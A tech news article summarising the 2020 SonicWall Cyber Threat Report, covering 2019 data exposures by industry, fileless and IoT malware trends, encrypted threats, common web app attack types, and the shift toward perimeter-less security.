IoT is a gold mine for hackers using fileless malware for cyberattacks

Data exposure is one of the biggest threats from attacks on IoT devices. A new report recommends a shift to perimeter-less security strategies.

How Barracuda leverages Microsoft Azure to deliver application security to customers Nitzan Miron, VP of application security services at Barracuda Networks, discusses the Azure-delivered WAF-as-a-Service product offering announced at Microsoft Ignite 2019

In 2019, security teams made progress in the adoption of perimeter-less security while hackers increased the use of fileless malware and IoT malware.  

The 2020 SonicWall Cyber Threat Report highlights tactics hackers are using to get unauthorized access to data as well as what security teams are doing to protect it. The good news is that the researchers at SonicWall found that overall there was a 6% decrease in overall malware attacks in 2019, with 9.9 billion incidents reported, compared to 10.5 billion in 2010. 

The report also complied the worst data leaks of the year. IoT company Orbivo had the biggest data exposure which included two billion records. The company makes an all-in-one control panel for smart devices, a smart door lock, a light switch controller, and an air-conditioning control set. 

SEE: 5G: What it means for IoT (ZDNet/TechRepublic special feature) | Download the free PDF version (TechRepublic)

Biggest data losses

According to the report, Facebook was responsible for almost all the social media data losses while First American and Capital One breaches showed up in the banking category. Biometrics and security company Suprema lost control of 27 million records. 

The top 10 data exposures by industry, according to the SonicWall report were: 

  1. IoT, 2 billion records (1 breach)
  2. Social media, 1.4 billion records (7 breaches)
  3. Banking/credit/finance, 1.1 billion records  (4 breaches)
  4. Business, 984 million records  (4 breaches)
  5. Technology, 817 million records (4 breaches)
  6. Entertainment, 271 million records (3 breaches)
  7. Education, 139 million records (1 breach)
  8. Retail, 73 million from (2 breaches)
  9. Healthcare, 42 million records (7 breaches)

The SonicWall report described advances in perimeter-less security, a new way of thinking about how to keep threats out.

Now that the attack surface is expanding fast in every direction, companies should rethink defense strategies, according to SonicWall. This means taking a comprehensive approach to security instead of segmented one. 

SEE: How to get users on board with essential security measures (free PDF)

The report authors suggest that the zero-trust security model should evolve into a secure access service edge (SASE), a term that comes from the Gartner security analysts Neil MacDonald, Lawrence Orans and Joe Skorupa in 2019. A SASE platform will combine software- and service-based networks, which will unify separate security solutions.

The report authors state that this perimeter-less security movement could also replace VPNs and firewall technology to provide "greater network visibility, seamless onboarding, and full compatibility with all major cloud providers."

On the offense side, hackers focused their efforts last year with these tools:

  • Encrypted threats
  • Fileless malware
  • IoT malware
  • Web app attacks

Here is a brief recap of each threat.                                                        

Fileless malware cyberattacks      

Fileless malware does not write its activity to the computer's hard drive, making it hard for standard forensic strategies such as file-based whitelisting, signature detection, pattern-analysis and hardware verification to defend against it.

The most common fileless malware in 2019 were:

  • Astaroth Backdoor Trojan
  • Divergent
  • Icedld Banking Trojan
  • GandCrab Ransomware
  • Kovter
  • Noderosk
  • PCASTLE Monero-Mining Malware
  • Ursnif Banking Trojan

The report said that SonicWall researchers found that fileless malware incidents spiked from May to September but trailed off after that.

Encrypted threats

This type of attack is also good at slipping past traditional security defenses. Launching malware across encrypted traffic works for threat actors because many firewall appliances do not have the capability or processing power to responsibly detect, inspect and mitigate cyberattacks sent via HTTPS traffic.

In 2019, SonicWall Capture Labs threat researchers recorded 3.7 million malware attacks sent over transport layer security (TLS) and secure sockets layer (SSL) traffic, a 27.3% year-over-year increase. SonicWall predicts this attack vector will increase in the future.

IoT attacks

The SonicWall researchers found a 5% increase in IoT malware with 34.3 million attacks during 2019.

The report lists common IoT security weaknesses as weak or hard-coded passwords, insecure networks and interfaces, and lack of secure update mechanisms.

Check Point Research just announced a vulnerability in Philips Smart Hue lightbulbs. A flaw in the firmware allows attackers to take control of an individual bulb, push malicious firmware to it, and spread other malicious software throughout a network. The exploit comes from the Zigbee low-power IoT protocol used for device communication by Philips and many other IoT product manufacturers.
 
It seems obvious, but it's worth repeating this observation from the report, "Given the tenuous landscape regarding data privacy, and the face that everything from nanny cams to doorbell are connected, IoT-focused attacks will only increase in 2020 and beyond."

App attacks

For 2019, SonicWall Capture Labs threat researchers recorded a 52% year-over-year increase in web app attacks and found that the attacks are getting more sophisticated.

Volume was largely flat until May, but SonicWall recorded spikes in across the final seven months of year to push total web app attack volume past 40 million.

Currently, the top known web attacks include SQL injection, directory traversal, cross-site scripting (XSS), broken authentication and session management, cross-site request forgery (CSRF) security misconfigurations and sensitive data exposure.

SonicWall lists this as the top WAF Attacks in 2019:

  • Bash Code Injection
  • Blind SQL Injection Attack Variant 12
  • Cross-site Scripting (XSS) Attack
  • PHP NULL Poisoning
  • SQL Injection Attack 1
  • SQL Injection Attack 11
  • Unauthorized Remote File Access
  • Web Application Directory Traversal Attack 1
  • Web Application Directory Traversal Attack 5
  • Web Application Directory Traversal Attack 6

Many organizations are adding web application firewalls to their defenses to harden their overall security posture.

Also see

Malware and hacking

Image: Getty Images/iStockphoto